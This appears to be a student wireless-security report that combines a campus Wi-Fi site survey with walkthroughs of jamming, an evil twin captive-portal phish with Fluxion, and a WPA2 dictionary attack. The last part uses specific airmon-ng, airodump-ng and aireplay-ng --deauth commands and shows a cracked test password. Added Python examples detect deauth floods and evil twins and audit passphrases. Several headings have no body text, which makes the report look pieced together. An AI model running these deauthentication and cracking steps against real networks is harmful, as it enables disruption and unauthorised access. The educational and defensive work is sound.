3.0 Test Plan/Specification ... 34
4.0 Demonstration of walkthrough ... 36
7.0 Evaluation and Solutions ... 40
Individual Part: EVIL TWIN ACCESS POINT ATTACK (Abdulaziz Aljawder TP032807) ... 41
1.0 Introduction ... 41
2.0 Aim and Objectives ... 42
3.0 Test Plan ... 45
4.0 Demonstration of walkthrough ... 46
5.0 Solution and Recommendations ... 52
6.0 Conclusion ... 52
Reference ... 53
1.0 Layout of Site Survey
3.0 Heat Map of Site Survey
4.0 Site Survey Result
The site survey was carried out with the Ekahau HeatMapper software at APU Level 6, Block D, outside classroom D6-04 (the Discussion Room). The figure above shows that the Wi-Fi coverage is decent: the bottom-left corner is shaded light green. Several access points are visible; the red circle marks the main access point to be tested, while the others belong to other classrooms and to areas outside the discussion room.
The figure above shows many access points with different signal strengths. There are many access points because each floor of the building block has to spread network coverage to every corner of the university. In the next sections, the researchers explain the site survey in more detail based on the diagram above: network interference within the area, packet sniffing in the area, and signal jamming, to determine whether each exists within the tested area.
Signal jamming is one of the exploits used in wireless network environments. It uses tools or scripts to interrupt wireless communications and can prevent users from connecting to a wireless access point. The attacker selects one target access point to attack; as a result, users of that access point are unable to reconnect to the network. The attack works by sending deauthentication packets to the access point. (Thesignaljammer.com, 2018)
Additionally, the wireless protocol has different kinds of management frames, which are used to establish and authenticate connections. One of them, the deauthentication frame, can be sent to an access point so that the affected clients are disconnected from the network. For example, an attacker may choose a place that provides free Wi-Fi and start a deauth attack to disrupt the wireless network, denying all client devices access to the target network and blocking their internet connection so that users cannot reconnect. (Medium, 2018)
5.1 Tools and Hardware
The tools used in this active attack are:
Websploit
Websploit is an open-source exploitation and automated vulnerability assessment tool that can scan and analyse a target to find various types of vulnerability (Sourceforge.net, 2018). The tool provides different types of modules for the user to choose from, for example Web modules, Network modules, Exploit modules and Wireless modules (Hacking, 2018). Each module lists the attack options the tool supports; for example, the Wi-Fi jammer is one of the attacks included in the Wireless modules.
Aircrack-ng
Aircrack-ng is a suite consisting of different tools for capturing and examining data packets from wireless networks. It supports analysis and cracking, such as password cracking and Wi-Fi jamming, against WPA and WPA2 wireless security, and it can be used in different areas of Wi-Fi network security: monitoring, attacking, testing and cracking. Each function gives different results; for example, monitoring focuses on packet capture and exporting data to text files for third-party tools. The suite can also run attacks such as replay attacks, deauthentication attacks and fake access points, and it checks and tests a Wi-Fi card's capability to capture and inject packets during an attack. Moreover, it can crack WEP, WPA and WPA2. (Aircrack-ng.org, 2018)
Airmon-ng is the tool included in the aircrack-ng package for enabling or disabling monitor mode on wireless interfaces (Kali Tools, 2017). It can also switch an interface from monitor mode back to managed mode.
Airodump-ng is used to capture raw 802.11 frames and is suitable for collecting WEP IVs for use with aircrack-ng (Aircrack-ng, 2018). It lists the access points it finds and writes out files containing details of the access points and clients that appear in the nearby area.
Aireplay-ng is used when cracking WEP, WPA and WPA2 keys. It offers several types of attack, including deauthentication to capture the WPA handshake, ARP request injection and more (Aircrack-ng, 2018).
Comparison Tools
-Wi-Fi Jammer -airsev-ng
Based on the comparison table of results, the tool chosen to carry out the Wi-Fi jamming attack is Aircrack-ng. All three tools are free to download from their websites as RAR files, which must be extracted to obtain the data files. All of the tools require the terminal to run the script or command line that performs the attack. Aircrack-ng is simple and effective for performing Wi-Fi jamming.
After the process completes, the Wi-Fi network the user wants to connect to shows "Can't connect to this network".
5.4 Impact of Wi-Fi Jamming
The impact of Wi-Fi jamming is that the attacker spams deauth messages to disconnect the target wireless network, and users are unable to reconnect to it. As long as the attacker keeps the program running, the user will never connect to the internet; the user can reconnect only once the attacker stops the program.
There is no solution that stops the attacker from sending the deauthentication packets. What can prevent the attack is to configure the network properly and keep it far away from the attacker's devices, so that the attacker cannot scan and compromise the Wi-Fi networks in the nearby area with a deauth attack.
One method of protecting the wireless network from the attacker is to check that the wireless network is secure, so that the attacker cannot easily pick the victim's wireless network as a target.
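Because the deauthentication frames described in the two sections above cannot be blocked on networks without protected management frames, detecting the burst is the practical control. The following Python script is an added example, not part of the report: it counts deauthentication/disassociation frames per (BSSID, destination) in a sliding window and raises an alert when a burst exceeds a threshold; the frame records are constructed (the AP and station addresses are the ones from the walkthrough later in this report), and the Frame record shape is an assumption standing in for a real decoder.

```python
"""Deauthentication-flood detector over already-decoded 802.11 frames.

Added example (not from the report). It assumes frames have been decoded
into simple records (type/subtype, addresses, timestamp) by a monitor-mode
capture tool; the sample frames below are constructed.
"""
from collections import defaultdict, deque
from dataclasses import dataclass
from typing import Deque, Dict, List, Optional, Tuple

# 802.11 frame type 0 is "management"; subtype 8 is a beacon, subtype 10 is
# disassociation and subtype 12 is deauthentication. Without 802.11w (PMF)
# the last two carry no authentication, which is why they can be forged.
MGMT_TYPE = 0
SUBTYPE_BEACON = 8
SUBTYPE_DISASSOC = 10
SUBTYPE_DEAUTH = 12
BROADCAST = "ff:ff:ff:ff:ff:ff"


@dataclass
class Frame:
    ts: float       # capture timestamp in seconds
    ftype: int      # frame type field
    subtype: int    # frame subtype field
    addr1: str      # receiver (destination) address
    addr2: str      # transmitter (source) address
    bssid: str


class DeauthFloodDetector:
    """Sliding-window counter keyed on (BSSID, destination address)."""

    def __init__(self, window_s: float = 2.0, threshold: int = 10):
        self.window_s = window_s
        self.threshold = threshold
        self._recent: Dict[Tuple[str, str], Deque[float]] = defaultdict(deque)
        self._last_alert: Dict[Tuple[str, str], float] = {}

    def feed(self, f: Frame) -> Optional[dict]:
        if f.ftype != MGMT_TYPE or f.subtype not in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            return None                       # only kick-off frames are counted
        key = (f.bssid.lower(), f.addr1.lower())
        q = self._recent[key]
        q.append(f.ts)
        while q and f.ts - q[0] > self.window_s:
            q.popleft()                       # drop timestamps outside the window
        if len(q) < self.threshold:
            return None
        last = self._last_alert.get(key)
        if last is not None and f.ts - last <= self.window_s:
            return None                       # one alert per burst, not per frame
        self._last_alert[key] = f.ts
        return {"bssid": key[0], "target": key[1], "count": len(q),
                "first_ts": q[0], "last_ts": f.ts}


def detect_deauth_floods(frames: List[Frame], window_s: float = 2.0,
                         threshold: int = 10) -> List[dict]:
    """Run the detector over a capture (any order) and return the alerts."""
    det = DeauthFloodDetector(window_s, threshold)
    alerts = []
    for f in sorted(frames, key=lambda x: x.ts):
        alert = det.feed(f)
        if alert:
            alerts.append(alert)
    return alerts


# Addresses from the report's walkthrough; OTHER is constructed.
AP = "84:C7:EA:7D:EE:7B"
STA = "64:09:80:CC:1C:BC"
OTHER = "02:00:00:00:00:01"


def sample_frames() -> List[Frame]:
    """Constructed capture: normal beacons, one genuine deauth from a client
    leaving, then a forged burst of 15 deauths aimed at STA within 0.2 s."""
    frames = [Frame(i * 0.1, MGMT_TYPE, SUBTYPE_BEACON, BROADCAST, AP, AP)
              for i in range(30)]
    frames.append(Frame(0.5, MGMT_TYPE, SUBTYPE_DEAUTH, AP, OTHER, AP))
    frames += [Frame(1.0 + i * 0.0125, MGMT_TYPE, SUBTYPE_DEAUTH, STA, AP, AP)
               for i in range(15)]
    return frames


if __name__ == "__main__":
    for a in detect_deauth_floods(sample_frames()):
        print(f"deauth flood: bssid={a['bssid']} target={a['target']} "
              f"{a['count']} frames in {a['last_ts'] - a['first_ts']:.3f}s")
```

Tune `window_s` and `threshold` to the capture: a single client roaming away sends one or two deauth frames, while a jamming tool sends dozens per second.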
6.0 Interference (Liau Sze Nan TP03415)
In communications and electronic equipment, particularly in telecommunications, interference refers to anything that modifies or destroys a signal as it propagates along a channel between a signal source and a receiver. The absence of wires that makes WLANs so attractive is also the feature that allows other devices to cause Wi-Fi interference. (Juniper, 2017) Wi-Fi interference is a common and troublesome issue because wireless signals travel through the atmosphere, which makes them susceptible to different types of interference than standard wired networks. (Harwood, 2009) It is therefore an important consideration when using wireless networks, since interference attenuates wireless signals. The effects of wireless interference include low signal strength in the Wi-Fi menu, an unstable Internet connection over Wi-Fi, and slow file transfer rates between computers when the Wi-Fi connection is slow or unstable.
wireless interference happen. Below is a table of wireless interference levels depending on the density of the materials.
• Microwave — the closer the router is to a microwave oven, the more network interference can be expected while the microwave is in use. That is especially true for older wireless routers, which, just like microwaves, operate in the 2.4 GHz spectrum.
• Cordless Phone — again in the 2.4 GHz spectrum. Just like the previous item, these phones can cause large signal interference; the Wi-Fi interference occurs during active calls.
• Other Wireless Devices — any wireless device can technically be the cause of signal interference: wireless speakers, baby monitors, garage door openers, etc. Other wireless devices operating in the 2.4 GHz or 5 GHz spectrum, including microwave transmitters and wireless cameras, can also contribute to wireless interference. (NetSpot, 2018)
6.5 Analysis
Based on the site survey result, the heat map shows that the APU New Campus Level 6, Block D, Discussion Room area is mostly covered in green, which means the Wi-Fi signal coverage is quite good. It shows that Wi-Fi interference in the discussion room is very low. However, the site survey was performed at around 4 p.m., when the discussion room had few people and Level 6 of Block D had few classes. The result would be different if the selected time were during working hours or peak hours, or when the area accommodated a lot of people.
This is because students always bring gadgets such as laptops and smartphones, all of which produce radio frequency interference. Since most wireless networks transmit their signals in a narrow radio frequency range around 2.4 GHz, it is common for devices on the same frequency to affect the wireless signal. (Mitchell, 2018) Besides, the APU New Campus Level 6, Block D, Discussion Room is mainly occupied by 12 tables with 48 chairs, and its floor is covered with carpet. Although the discussion room furniture has no wireless features, it can act as a set of physical obstacles. All of the physical obstacles in the Block D, Level 6 discussion room may cause reflection, refraction, diffraction, scattering or absorption phenomena that affect the Wi-Fi signal. (Cook, 2015)
6.6 Comparison of Software
Ekahau HeatMapper
HeatMapper is the free version of networking design toolmaker Ekahau's Wi-Fi Site and Survey Planner, an enterprise Wi-Fi planning and wireless site survey tool. It offers an attractive graphical overview of the airwaves over the floor plan and even some information about the security settings of detected Wi-Fi networks. (Geier, 2017) Below are the features of Ekahau HeatMapper:
NetSpot
NetSpot is a Wi-Fi stumbler and map-based survey tool, but in the free Home edition reviewed, the map-based survey tool is disabled. It is available for both Windows and Mac OS X. On its simple GUI, the network details of the SSIDs are shown bold and clear. Signal levels are shown as negative dBm values and as percentages. It does not show hidden networks on the network list at all. (Geier, 2017) Below are the features of NetSpot:
Feature                                    Ekahau HeatMapper               NetSpot
Creator                                    Ekahau                          NetSpot
Operating System                           Windows                         Windows and Mac OS
Supported Networks                         802.11n, as well as a/b/g       Any 802.11 network
Simulated APs & Coverage                   Yes                             Yes, Pro version only
Simultaneous active and passive surveys    Yes                             Yes
Furthermore, wireless networks allow more than one person to communicate with a network source at any one time. This sharing of the connection means that the more subscribers use the network, the more devices the access point has to communicate with simultaneously. The access point has to divide its resources among subscribers according to the number of radios it operates. (Solutions, 2018) To address this issue, APU broadcasts the Staff APU and BYOD SSIDs for APU staff and students. The Staff APU SSID is for APU staff only, and the BYOD SSID supports the 5 GHz Wi-Fi band. Since many devices nowadays support 5 GHz Wi-Fi, students can switch to BYOD instead of using 2.4 GHz.
7.0 Threats and Issues to WLAN (Abdulaziz Aljawder TP032807)
• Denial of Service: In this type of attack, an intruder floods the network with valid or invalid messages that affect the availability of network resources. Due to the nature of radio transmission, WLANs are very vulnerable to denial of service attacks.
• Spoofing and session hijacking: An attacker can access privileged data and resources on the network by assuming the identity of a valid user. This happens because the 802.11 network does not authenticate the source address, which is the media access control (MAC) address of the frame. Therefore, an attacker could spoof the MAC address and hijack the session.
• Eavesdropping: This involves compromising the confidentiality of data transmitted over the network. By their very nature, wireless LANs deliberately radiate network traffic into space, which makes it impossible to control who can receive the signals in any wireless LAN installation.
7.1 Solutions
• Change Default SSID: The Service Set Identifier (SSID) is a unique identifier attached to the
packet header sent over the WLAN, which acts as a password when the mobile device attempts
to connect to a particular WLAN. The SSID distinguishes one WLAN from another, so all access
points and all devices attempting to connect to a particular WLAN must use the same SSID. In
fact, it is the only security mechanism the access point needs to enable association when the
optional security feature is not activated.
• As shown, the wireless AP is behind a corporate firewall in a typical wireless implementation.
This type of implementation opens a big hole in the trusted network space. A secure way to
implement a wireless AP is to place it behind a VPN server. This type of implementation
provides high security for wireless network implementations without adding significant overhead
to the user.
• VPN is a more comprehensive solution that authenticates users from untrusted spaces and
encrypts their communications so that someone can't intercept it.
• TKIP: The Temporal Key Integrity Protocol (TKIP), originally called WEP2, is designed to address all known attacks and defects in the WEP algorithm.
Individual Part (Evil Twin Attack) (Loh Choon Way TP041264)
1.0 Statement
An evil twin is a fraudulent Wi-Fi access point that appears to be legitimate but is set up to eavesdrop on wireless communications. The evil twin is the wireless LAN equivalent of the phishing scam.
2.0 Aim
To steal the passwords of unsuspecting users, either by monitoring their connections or by phishing, which involves setting up a fraudulent web site and luring people there.
When users log into unsecured (non-HTTPS) bank or e-mail accounts, the attacker intercepts the transaction, since it is sent through the attacker's equipment. The attacker is also able to connect to other networks using the users' credentials.
Wireless stations generally do not connect to specific APs; they connect to any AP with a given SSID and the best signal. Worse, many stations automatically reconnect to any SSID used in the past. Simply placing an Evil Twin near business users can be enough to trick their wireless devices into associating with the phony AP. An attacker who gets impatient waiting for users to roam to the Evil Twin can use a tool like Aireplay to deauthenticate everyone, forcing immediate reassociation. (rootsh3ll, 2018)
Fake access points are set up by configuring a wireless card to act as an access point. They are
hard to trace since they can be shut off instantly. The counterfeit access point may be given the
same SSID and BSSID as a nearby Wi-Fi network. The evil twin can be configured to pass
Internet traffic through to the legitimate access point while monitoring the victim's connection,
or it can simply say the system is temporarily unavailable after obtaining a username and
password.
5.0 Selection of Tools - Comparison
Fluxion
Fluxion is the future blend of technical and social engineering automation that tricks a user into handing over the Wi-Fi password in a matter of keystrokes. Specifically, it is a social engineering framework using an evil twin access point (AP), integrated jamming and handshake capture functions to ignore the hardware and focus on the "wetware". Tools such as Wifiphisher execute similar attacks but lack the ability to verify the WPA passwords supplied.
Fluxion evolved from an advanced social engineering attack named Lindset, where the original
tool was written mostly in Spanish and suffered from a number of bugs. Fluxion is a rewritten
attack to trick inexperienced users into divulging the password/passphrase of the network.
Fluxion is a unique tool in its use of a WPA handshake to not only control the behaviour of the
login page, but the behaviour of the entire script. It jams the original network and creates a clone
with the same name, enticing the disconnected user to join. This presents a fake login page
indicating the router needs to restart or load firmware and requests the network password to
proceed. Simple as that.
Features
• A fake DNS server is launched in order to capture all DNS requests and redirect them
to the host running the script
• A captive portal is launched in order to serve a page, which prompts the user to enter
their WPA password
• Each submitted password is verified by the handshake captured earlier
• The attack will automatically terminate, as soon as a correct password is submitted
Airgeddon
Airgeddon is a multi-use bash script for Linux systems to audit wireless networks. Airgeddon presents a menu with many options, each a different attack to use on the victim. Each attack is designed to produce a different effect when performing a wireless attack with this multi-use bash script. Airgeddon includes DDOS attacks, WPS attacks, Rogue Access Point, Evil Twin attacks and others.
Features
Comparison table of tools
For the vulnerability testing, the Evil Twin Attack (Fluxion) is chosen to proceed with the testing. Fluxion can be cloned from GitHub with git clone and run from the terminal command line. Fluxion is a simple and easy tool for doing the testing.
2. Run Fluxion
If all required files are updated and installed, Fluxion will run; otherwise a list of unavailable files is shown.
To do this, go to the install directory and open a terminal there. Now run: ./install.sh
4. Cracking WiFi
Select Language
Select Channels; it will start scanning the nearby networks on all channels.
Select pyrit
After the handshake is captured, close both windows and, under Status Handshake, select Check handshake.
Select Login Page
5. Result
Now wait for the user to connect to our open twin AP and enter the key for authentication. After a user connects, he/she has to enter the password. As soon as the target enters the password, the attacker obtains it.
7.0 Conclusion
Given the success of Wi-Fi networks, wireless clients are vulnerable to a variety of threats such as the evil twin attack. This attack evolved from traditional phishing attacks and is well known as the wireless version of the email phishing scam. The attack requires no special equipment and is easy to implement. Although few solutions exist today, most of them are designed to work on corporate wireless devices. Two solutions were discussed with emphasis on their limitations. Users can protect themselves by disabling their wireless network interface card (NIC) when not connected to a wireless network. Users should also connect to Wi-Fi networks manually and avoid setting up the device to connect automatically. When entering information on the web, one should always check the address bar to determine whether the web browser connection is secure. The most important thing for the user to remember is to be vigilant, not to take things for granted, and always to confirm connections.
Individual Part - Wi-Fi Password Dictionary Attack (Liau Sze Nan TP034915)
1.0 Statement
Wi-Fi Protected Access (WPA) and Wi-Fi Protected Access II (WPA2) are two security protocols and security certification programs developed by the Wi-Fi Alliance to secure wireless computer networks. (Rouse, 2014) Although WPA2 is widely used to secure wireless networks today, it is still vulnerable to attacks such as the dictionary attack. A dictionary attack is an attempt to defeat a password or authentication mechanism with a brute-force technique, trying hundreds or sometimes millions of possibilities, such as the words in a dictionary, to determine its decryption key or password. It is a method of breaking into a password-protected computer or server by systematically entering every word in a dictionary as the password. Dictionary attacks are often successful because many users and businesses use ordinary words as Wi-Fi passwords. (Inc, 2018) They succeed against systems that employ multiple-word phrases and fail against systems that employ random combinations of uppercase and lowercase letters mixed with numerals. (Rouse, 2005)
Aim
To study the penetration testing of dictionary attack by using the aircrack-ng techniques
Objective
2.0 Selection of Tools
Aircrack-ng
Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless LANs. It works with any wireless network interface controller whose driver supports raw monitoring mode and can sniff 802.11a, 802.11b and 802.11g traffic. It supports several operating systems, such as Windows, Linux, BSD and OS X. It is usually used for monitoring: packet capture and export of data to text files for further processing. Besides, it can be used to initiate attacks such as replay attacks, deauthentication, fake access points and others via packet injection. Furthermore, it can also be used for testing purposes, such as checking Wi-Fi cards' and drivers' capabilities for capture and injection, and for cracking WEP, WPA and WPA2-PSK. (Aspyct.org, 2018)
Aircrack-ng Features
Name            Description
aircrack-ng     Cracks WEP keys using the Fluhrer, Mantin and Shamir (FMS) attack, the PTW attack and dictionary attacks, and WPA/WPA2-PSK using dictionary attacks.
airdecap-ng     Decrypts WEP or WPA encrypted capture files with a known key.
airmon-ng       Places different cards in monitor mode.
aireplay-ng     Packet injector (Linux, and Windows with CommView drivers).
airodump-ng     Packet sniffer: places air traffic into pcap or IVS files and shows information about networks.
airtun-ng       Virtual tunnel interface creator.
packetforge-ng  Creates encrypted packets for injection.
ivstools        Tools to merge and convert.
airbase-ng      Incorporates techniques for attacking clients, as opposed to access points.
airdecloak-ng   Removes WEP cloaking from pcap files.
airolib-ng      Stores and manages ESSID and password lists and computes Pairwise Master Keys.
airserv-ng      Allows access to the wireless card from other computers.
buddy-ng        The helper server for easside-ng, run on a remote computer.
easside-ng      A tool for communicating with an access point without the WEP key.
tkiptun-ng      WPA/TKIP attack.
wesside-ng      Automatic tool for recovering a WEP key.
KisMAC
KisMAC is a wireless network discovery tool for Mac OS X. It has a wide range of features, similar to those of Kismet. The program is geared toward network security professionals and is not as novice-friendly as similar applications. It scans for networks passively on supported cards, including Apple's AirPort and AirPort Extreme and many third-party cards, and actively on any card supported by Mac OS X. Cracking of WEP and WPA keys, by brute force and by exploiting flaws such as weak scheduling and badly generated keys, is supported when a card capable of monitor mode is used. (Software, 2018)
KisMAC Features
• AppleScript-able
• Kismet drone support (capture from a Kismet drone)
1. Install VMware Workstation Pro 12 or above and set up the Kali Linux operating system (kali-linux-2018.3-vm-amd64) in VMware.
2. Insert or plug in the TP-Link wireless adapter and make sure the Kali Linux operating system is connected to the internet.
3. Create or download a password dictionary and make sure the Wi-Fi router or hotspot is turned on.
4. Set the TP-Link wireless adapter interface to monitor mode using the airmon-ng command.
5. Type the airodump-ng command to scan and monitor the surrounding Wi-Fi networks or hotspots available.
6. Select a target Wi-Fi network and generate a handshake file.
7. Type the aireplay-ng command to deauthenticate a client or user.
8. Type the aircrack-ng command to crack the handshake file with the password dictionary.
9. Connect to the target Wi-Fi network or hotspot using the cracked password.
4.0 Demonstration of walkthrough
1. Check the Wireless TP link adapter interface
Insert or plug in the TP-Link wireless adapter and make sure the Kali Linux operating system is connected to the internet. To make sure the TP-Link wireless adapter is connected to the Kali Linux operating system, type the "ifconfig" command to list the configuration of the network interfaces. Based on the diagram above, wlan0 is the TP-Link wireless adapter interface.
Create or download a password dictionary and place it where you can find it. Based on the diagram, testing.txt is my password dictionary, located at /root/Desktop.
Based on the diagram above, type "airmon-ng" to find the connected network interface. wlan0 is the TP-Link wireless adapter interface.
Based on the diagram above, in the command prompt type "airmon-ng start wlan0" to set the wlan0 network interface to monitor mode; it will become wlan0mon.
Based on the diagram above, type the command "airodump-ng wlan0mon" to scan the surrounding target Wi-Fi networks available. After that, press CTRL + C to stop the scanning once you have found the target Wi-Fi network. Here the ESSID "testing" is our target Wi-Fi network; it uses WPA2 security on channel 1, and its BSSID is 84:C7:EA:7D:EE:7B.
Based on the diagram above, generate a handshake file with the command "airodump-ng --channel 1 --bssid 84:C7:EA:7D:EE:7B --write handshake wlan0mon".
After that, it is important to have a user device connected to the target Wi-Fi network. When a user device connects to the target Wi-Fi network, its BSSID is shown under STATION. Based on the diagram above, the user device's BSSID is 64:09:80:CC:1C:BC, which is listed under STATION.
Based on the diagram above, type the command "aireplay-ng --deauth 5 -a 84:C7:EA:7D:EE:7B -c 64:09:80:CC:1C:BC wlan0mon" to deauthenticate the user.
Base on the diagram, the password of the testing target Wi-Fi is “nibuzhidao”
Therefore, Wi-Fi passwords need to be unique, updated regularly and kept in a credible password manager. Create strong passwords: the stronger the user's password, the harder it will be to guess. Stronger passwords combine special characters such as symbols, numbers and capital letters to increase the complexity of the password. Do not use common passwords such as a family name, nickname or birthday. Last but not least, change the Wi-Fi password once a month so that others cannot guess your Wi-Fi password or keep using your Wi-Fi.
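The dictionary attack in the Statement and walkthrough works because WPA2-Personal derives its Pairwise Master Key from the passphrase and the SSID with a fixed, offline-computable function, so every word in testing.txt can be tried without touching the router. The Python below is an added example, not code from the report: it implements that standard derivation (PBKDF2-HMAC-SHA1, 4096 rounds, SSID as salt, from IEEE 802.11i), measures the cost of one guess, and audits a passphrase against the recommendations above; the sample wordlist is constructed, and the audit's entropy estimate and "weak" rule are this example's own thresholds.

```python
"""WPA2-PSK key derivation, per-guess cost, and passphrase audit.

Added example (not from the report). Only hashlib and the standard library
are used; the derivation is the one defined by IEEE 802.11i for
WPA/WPA2-Personal.
"""
import hashlib
import math
import string
import time
from typing import Iterable

PBKDF2_ITERATIONS = 4096   # fixed by 802.11i; this is the whole cost of one guess
PMK_LEN = 32               # 256-bit Pairwise Master Key
WPA_MIN_LEN, WPA_MAX_LEN = 8, 63   # allowed passphrase length per 802.11i


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).

    The SSID is the salt: a precomputed PMK table (what airolib-ng in the
    feature table stores) is only valid for one SSID, which is the concrete
    reason the report's "change default SSID" advice raises the attacker's
    cost."""
    if not WPA_MIN_LEN <= len(passphrase) <= WPA_MAX_LEN:
        raise ValueError("WPA passphrase must be 8 to 63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, PMK_LEN)


def seconds_per_pmk(samples: int = 20, ssid: str = "testing") -> float:
    """Measure one derivation on this machine; a dictionary attack (step 8)
    costs at least wordlist_size * this many seconds on the same hardware."""
    start = time.perf_counter()
    for i in range(samples):
        wpa2_pmk(f"guess-{i:04d}", ssid)
    return (time.perf_counter() - start) / samples


def dictionary_cost_seconds(wordlist_size: int, per_pmk: float) -> float:
    """Worst-case time to try every word (the attack stops at the first hit)."""
    return wordlist_size * per_pmk


def passphrase_audit(passphrase: str, wordlist: Iterable[str]) -> dict:
    """Apply the report's recommendations: not a dictionary word, mixed
    character classes, and an entropy estimate from the character set used.
    The 'weak' rule (dictionary hit, fewer than three classes, or shorter
    than 8 characters) is this example's own threshold."""
    classes = {
        "lower": any(c in string.ascii_lowercase for c in passphrase),
        "upper": any(c in string.ascii_uppercase for c in passphrase),
        "digit": any(c in string.digits for c in passphrase),
        "symbol": any(c in string.punctuation for c in passphrase),
    }
    sizes = {"lower": 26, "upper": 26, "digit": 10, "symbol": len(string.punctuation)}
    charset = sum(sizes[name] for name, used in classes.items() if used)
    entropy_bits = len(passphrase) * math.log2(charset) if charset else 0.0
    in_list = passphrase in set(wordlist)
    n_classes = sum(classes.values())
    return {
        "length": len(passphrase),
        "wpa_length_ok": WPA_MIN_LEN <= len(passphrase) <= WPA_MAX_LEN,
        "in_wordlist": in_list,
        "classes_used": n_classes,
        "entropy_bits": round(entropy_bits, 1),
        "weak": in_list or n_classes < 3 or len(passphrase) < WPA_MIN_LEN,
    }


# Constructed sample wordlist standing in for the report's testing.txt; it
# contains the walkthrough's passphrase, so the audit reports a dictionary hit.
SAMPLE_WORDLIST = ["password", "12345678", "nibuzhidao", "welcome1", "qwertyui"]


if __name__ == "__main__":
    per_guess = seconds_per_pmk()
    print(f"one PBKDF2 guess: {per_guess * 1000:.2f} ms")
    print(f"{len(SAMPLE_WORDLIST)} words: "
          f"{dictionary_cost_seconds(len(SAMPLE_WORDLIST), per_guess):.3f} s worst case")
    for candidate in ("nibuzhidao", "Tr0ub4dor&3-dormitory"):
        print(candidate, passphrase_audit(candidate, SAMPLE_WORDLIST))
```

The per-guess time printed here is the single-CPU Python cost; dedicated cracking hardware is far faster, which is why a passphrase that is in any wordlist is weak regardless of the measured number.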
Individual Part: EVIL TWIN ACCESS POINT ATTACK (Abdulaziz Aljawder TP032807)
1.0 Introduction:
Over the years, wireless signals have evolved from hypothetical observations to easy-to-apply
sciences that play an important role in many aspects of modern life. Due to the discovery of radio
waves in 1880, wireless communication became conceivable, which led to the main exhibition of
telegraph communication. In 1901, operators transmitted short-range wireless signals between
Canada and the United Kingdom, the first long-distance wireless transmission. Later, Edwin
Armstrong discovered portable radios, FM frequencies and super regenerative receivers, all of
which laid the foundation for future developments in the field.
With innovative innovation, in 1970, Professor Norman Abramson created Alohanet, a pioneer
in Ethernet and future wireless signals. His development uses radio tags to quickly meet less
demanding information transmission needs. Later, in 1979, the main business simple mobile
phone framework was accessible in Japan. After a period of time, the progress of various mobile
phones in different countries is constantly increasing, and every mobile phone is striving to
expand the innovation of its pioneers. In 2000, South Korea promoted the widespread use of the
world's first 3G commercial system, and by 2009, 4G systems had become popular. This latest
development also addresses the variety of devices that flock to 2.4 GHz to ensure
more data transfer. Experts speculate on the future of wireless networks, and many predict that
these systems will continue to provide more accessibility to all users.
Thanks to the rapid development of wireless LANs and the widespread deployment of Wi-Fi
devices, it can help users easily access the network and allow users to connect to any Wi-Fi
wireless Internet hotspot in public places. As a result, they become more vulnerable to fraud and
identity theft.
A malicious evil twin attack clones a legitimate Wi-Fi access point that the victim uses. This attack on wireless networks has been known and documented for a long time. To perform the attack, the rogue access point broadcasts the SSID that the victim system wants to connect to. Typically, clients connect to known networks as they come into range. This is especially true for public hotspots that do not use encryption, because the client cannot distinguish between the real and the malicious access point. If the attacker also provides Internet access, the user will not notice any difference after connecting. Therefore, the usual recommendation is to always use WPA2 encryption.
When a pre-shared key is in use, the connection to the rogue access point will not succeed because the access point cannot decrypt the packets from the client and vice versa. In any case, very little information is available about how the attack affects WPA2 Enterprise.
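The symptom this section and the earlier Evil Twin statement describe, a second access point advertising the same network name, can be checked against a site-survey baseline. The Python below is an added example, not from the report: it flags beacons whose BSSID is not in the baseline for that SSID, whose security differs from the surveyed setting (an open twin of a WPA2 network), or whose BSSID is seen on more than one channel; the baseline entry for "testing" uses the BSSID from the dictionary-attack walkthrough, and all other addresses and beacon records are constructed.

```python
"""Evil-twin indicators from a scan of nearby access points.

Added example (not from the report). Input is a list of observed beacons
(SSID, BSSID, channel, security, RSSI) as a survey tool like airodump-ng
would list them; the records below are constructed.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple


@dataclass(frozen=True)
class Beacon:
    ssid: str
    bssid: str
    channel: int
    security: str    # e.g. "OPEN", "WPA2-PSK", "WPA2-EAP"
    rssi_dbm: int


# Site-survey baseline: which BSSIDs legitimately serve each SSID and what
# security they advertise. "testing" uses the walkthrough's BSSID; the
# "BYOD" entry is constructed.
BASELINE: Dict[str, dict] = {
    "testing": {"bssids": {"84:c7:ea:7d:ee:7b"}, "security": "WPA2-PSK"},
    "BYOD": {"bssids": {"02:aa:bb:cc:dd:01", "02:aa:bb:cc:dd:02"},
             "security": "WPA2-EAP"},
}

Finding = Tuple[str, str, str]   # (ssid, bssid, reason)


def evil_twin_indicators(beacons: List[Beacon],
                         baseline: Dict[str, dict]) -> List[Finding]:
    """Compare every observed beacon with the baseline for its SSID."""
    findings: List[Finding] = []
    channels_by_bssid: Dict[str, Set[int]] = defaultdict(set)
    for b in beacons:
        channels_by_bssid[b.bssid.lower()].add(b.channel)

    for b in beacons:
        expected = baseline.get(b.ssid)
        if expected is None:
            continue   # SSID not in our survey; nothing to compare against
        bssid = b.bssid.lower()
        if bssid not in expected["bssids"]:
            # Someone else is beaconing our network name (the page's
            # "two access points with the same network name").
            findings.append((b.ssid, b.bssid, "BSSID not in site-survey baseline"))
        if b.security != expected["security"]:
            # An open twin of a protected network is the classic lure.
            findings.append((b.ssid, b.bssid,
                             f"security mismatch: saw {b.security}, "
                             f"expected {expected['security']}"))

    for bssid, chans in channels_by_bssid.items():
        if len(chans) > 1:
            # The page notes the twin may copy the BSSID too; a real radio
            # beacons on one channel, a clone usually shows up on another.
            findings.append(("*", bssid,
                             f"same BSSID beaconing on channels {sorted(chans)}"))
    return findings


# Constructed scan: the real AP, an open twin with a stronger signal, a
# BSSID clone on another channel, and an unrelated network.
SAMPLE_SCAN = [
    Beacon("testing", "84:C7:EA:7D:EE:7B", 1, "WPA2-PSK", -48),
    Beacon("testing", "02:13:37:00:00:01", 6, "OPEN", -31),
    Beacon("testing", "84:C7:EA:7D:EE:7B", 11, "WPA2-PSK", -62),
    Beacon("CafeGuest", "02:13:37:00:00:02", 1, "OPEN", -70),
]


if __name__ == "__main__":
    for ssid, bssid, reason in evil_twin_indicators(SAMPLE_SCAN, BASELINE):
        print(f"[{ssid}] {bssid}: {reason}")
```

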